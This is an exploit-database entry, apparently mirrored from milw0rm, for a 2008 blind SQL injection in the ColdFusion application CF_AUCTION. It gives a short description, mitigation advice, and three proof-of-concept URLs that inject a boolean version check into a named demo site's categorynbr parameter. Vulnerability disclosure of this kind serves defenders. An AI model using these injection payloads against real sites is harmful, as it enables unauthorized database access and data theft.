CF_AUCTION

vendor:

CF_AUCTION

by:

AlpHaNiX

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: CF_AUCTION

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A Blind SQL Injection vulnerability exists in CF_AUCTION, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive data, modify data, or even execute system commands on the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CF_AUCTION
#download : null
#Demo     : http://www.cfwebsite.com/


###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--

http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=5   TRUE
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=4   FALSE
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=3   FALSE


###########################################################################

# milw0rm.com [2008-12-10]